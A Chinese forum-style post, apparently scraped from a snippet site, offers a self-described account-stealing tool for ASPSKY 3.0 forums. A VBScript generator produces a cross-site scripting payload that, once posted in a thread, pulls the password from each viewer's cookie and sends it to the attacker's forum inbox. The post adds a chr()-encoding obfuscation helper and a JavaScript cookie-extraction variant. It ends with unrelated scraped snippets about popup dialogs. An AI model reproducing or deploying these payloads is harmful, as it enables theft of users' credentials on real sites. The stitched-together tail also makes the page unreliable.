完美的解决跨站脚本的COOKIE弹框的问题

cookie|脚本|解决|问题

先头看到欲望之翼的self.window的办法
其实我一直有个从来没给任何人说的办法:
玩了好久了公布了呵呵:
<html>
<script language=vbs>
sub changeq()
if form1.loc.value="" or form1.who.value="" then
msgbox "没有加入地址或用户名?"
exit sub
end if
loc=form1.loc.value
user=form1.who.value
str="rtAdjacentHTML(""beforeEnd"",""<div style=display:none&
gt;<iframe id=sendmessage></iframe></div>""):call se
ndmessage.window.open(""" & loc & "/messanger.asp?action=send&touser="
& user & "&title=""+mid(document.cookie,instr(lcase(document.cookie),
""password"")+9,10)+""&message=""+""I am a goo
d boy"",""_self"")  ")" />"
form1.area.value=str
end sub

</script>
<body>
<FONT SIZE=7 COLOR=RED>ASPSKY 3.0 偷号器---C.Z.Y原创</FONT>
<form name=form1>
设置发送地址:<input type=text name=loc size=50><br>
▲注意发送地址形如:http://www.nnit30.com/newbbs(newbbs是网站中论坛的安装目录
最后
不用加/)<br>
发送的用户名:<input type=text name=who size=20>-------------
<input type=button name=change value=生成代码 onclick=changeq()><br>
生成的代码:)<textarea name=area rows=10 cols=100></textarea>
</form>
</body>
</html>

搞了大半天的结果,偷aspsky 3.0 密码的东东把下面的代码改一改
然后发到你的贴子里,只要有人看你的贴子他的密码就自动发到你的在
论坛上的邮箱里了,爽吧,其实我的是用VBScript写的snwcwt用javascript
写的没有双引号的问题而且可以同时写几行代码所以要实用一些!!
不过效果都差不多哈:)(注意要先把下面的东东改一下发送的地址然
后全部写在一行里)

简化形式:window.open(打开的连接,窗体名,窗体大小设置)
打开的连接:
第一部份:http://xxx.xxx.xxx.xxx/xxxx/messanger.asp?action=send.....
对应编码为

chr(104)&chr(116)&chr(116)&chr(112)&chr(58)&chr(47)&chr(47)&chr(119)&
chr(119)&chr(119)&chr(46)&chr(110)&chr(110)&chr(105)&chr(116)&chr(51)&chr(48)&ch
r(46)&chr(99)&chr(111)&chr(109)&chr(47)&chr(110)&chr(101)&chr(119)&chr(98)&chr(9
8)&chr(115)&chr(47)&chr(109)&chr(101)&chr(115)&chr(115)&chr(97)&chr(110)&chr(103
)&chr(101)&chr(114)&chr(46)&chr(97)&chr(115)&chr(112)&chr(63)&chr(97)&chr(99)&ch
r(116)&chr(105)&chr(111)&chr(110)&chr(61)&chr(115)&chr(101)&chr(110)&chr(100)&ch
r(38)&chr(116)&chr(111)&chr(117)&chr(115)&chr(101)&chr(114)&chr(61)&chr(99)&chr(
122)&chr(121)&chr(38)&chr(116)&chr(105)&chr(116)&chr(108)&chr(101)&chr(61)&chr(1
04)&chr(105)&chr(104)&chr(105)&chr(38)&chr(109)&chr(101)&chr(115)&chr(115)&chr(9
7)&chr(103)&chr(101)&chr(61)

不同的网站要自已改注意在哪儿结束同时还有发到的用户名都在这儿改
对于编码看如下代码:

<html>
<script language=vbs>
sub main()
base=form1.text1.value
for i=1 to len(base)
aa=asc(mid(base,i,1))
document.write "chr(" & aa & ")" & "&"
next
end sub
</script>
<body ><form name=form1><table>
<tr><td>
<input type=text name=text1 size=40><br>
<input type=button name=button1 onclick=main() value=change>
</td></tr>
</table></form></body></html>

第二部份:为提取的COOKIE中的用户名和密码

------------------------再来一个js的放便学习----------------------------------

'username=\');var iUser1=myCookie.indexOf(\'&\',iUser0);if(iUser1==-1) iUser1=my
Cookie.length;var username=myCookie.substring(iUser0+9,iUser1);var iPW0=myCookie
.indexOf(\'password=\');iPW1=myCookie.indexOf(\'&\',iPW0);if(iPW1==-1) iPW1=myCo
okie.length;var password=myCookie.substring(iPW0+9,iPW1);document.body.insertAdj
acentHTML(\'BeforeEnd\',\'<div style=display:block><iframe id=sendmessage src=me
ssanger.asp?action=new&touser=snwcwt></iframe></div>\');sendmessage.window.docum
ent.location=\'

时间: 2025-01-20 23:00:08

完美的解决跨站脚本的COOKIE弹框的问题的相关文章

完美的解决跨站脚本的COOKIE弹框框的问题

cookie|脚本|解决|问题 先头看到欲望之翼的self.window的办法 其实我一直有个从来没给任何人说的办法: 玩了好久了公布了呵呵:<html> <script language=vbs> sub changeq() if form1.loc.value="" or form1.who.value="" then msgbox "没有加入地址或用户名?" exit sub end if loc=form1.loc

求解决-弹框的X不起作用 点击无反应

问题描述 弹框的X不起作用 点击无反应 JRF.popupWindow = function(i) { var E = """"; var s = ""_blank""; var y = ""500""; var u = ""300""; var t = ""auto""; var a = false; va

前端最好用弹框组件-layer

layer是一款近年来备受青睐的web弹层组件,它甚至兼容了包括IE6在内的所有主流浏览器;而且layer采用MIT开源许可证,将会永久性提供无偿服务.现在你肯定对layer充满了兴趣,首先,了解layer肯定避不开layui,layui是一个集合多个组件,例如:layer/laypage/laydate等的前端框架,和Bootstrap是同类别的,而layer一直是layui的代表作.如果舍弃layui单独使用layer的话,他需要依赖于jq1.8以上版本引入:废话不多说,直接能进入layer

asp.net-表单提交两次IE出现弹框

问题描述 表单提交两次IE出现弹框 我现在做了一个页面:根据条件查询出数据,然后以分页的形式体现,每一行有一个多选框,可以批量的更改状态.状态发生改变后,就消失在页面上,但我仍然还需要停留在,是我以条件查询出来的数据,我用了反刷新,表单提交两次出现弹框.求各位解决下 解决方案 结合你的代码调试下.可以让服务器记住表单再回传或者用ajax避免刷新 解决方案二: 你的问题标签里面选了jquery,你的客户端查询条件提交和更新的代码是怎么样子的? 什么是放刷新,为什么要提交两次呢?查询就是查询,返回你

vc++开发给本地应用注册url协议时遇到弹框问题(伪协议)

问题描述 vc++开发给本地应用注册url协议时遇到弹框问题(伪协议) 如题,会弹出以下内容,怎么解决各位大神!我这里注册一个协议 但是每次点击都会弹框啊 解决方案 不要选那个复选框不就行么? 解决方案二: 在程序里面怎么避免弹框啊?

js-发送ajax请求到后台获取的数据不能显示到弹框&amp;amp;lt;div&amp;amp;gt;中

问题描述 发送ajax请求到后台获取的数据不能显示到弹框<div>中 点击按钮发送ajax请求到后台获取的数据,div能弹出来,但是下面的数据不显示,如下图(块里面为空,无数据,只有表头): 在html的标签中的代码:<br> <img src="http://img.ask.csdn.net/upload/201511/23/1448285257_457694.jpg" alt="图片说明"><br> 红框①中的数据

基于Layer+jQuery的自定义弹框_jquery

目的:XXXX项目中,很多的弹窗是利用freemarker的网页标签追加的形式实现的,网页弹框只是将隐藏的div显示出来,这样会使网页在预加载时速度变慢,增加页面加载和响应时间 解决方法如下:<已分中心管理的添加分中心弹框实现机制为例> 1.弹框页面部分的html代码和css抽离 html : html/configure/layer-win/_group-add-layer.html css : css/common/componnentWin.css <自定义弹窗通用样式> 子

ie6(或者其他浏览器)使用dialog弹框访问(交互数据)服务器失败(artdialog -v5.0.4)

       在网页开发中,网页弹框用于提示或者和用户交互是必要之一,方便用户使用和提高用户的体验.可弹框实现有多种办法,可是"jquery.ui.dialog.js"实现的弹框,在ie6或者使用专用网络或者用类似浏览器软件(本质是浏览器)访问服务器,可能导致客户端正确访问(发送和接受数据异常[null])服务器失败.        后来调查原因发现是专用网络(url)或者用类似浏览器软件,导致dialog弹框提交数据失败.归根到底,就是因为,这些和dialog不兼容,那么去修改dia

Android填坑系列:在小米系列等机型上放开定位权限后的定位请求弹框示例_Android

背景 近期因实际项目需要,在特定操作下触发定位请求,取到用户位置及附近位置. 问题: 经初步选型,最终决定接入百度定位,按照百度定位SDK Android文档,接入过程相对顺利. 但随后发现,在小米系列等部分机型上,进入app后会出现"正在尝试 通过网络或者卫星对您的手机进行定位". 很影响用户体验. 解决过程: 1.Flurry的小坑 项目中引入了数个第三方SDK,主要包括Flurry,友盟,个推,百度定位SDK等.在App启动初始化及进入到首页的执行流中,主要涉及到Flurry,友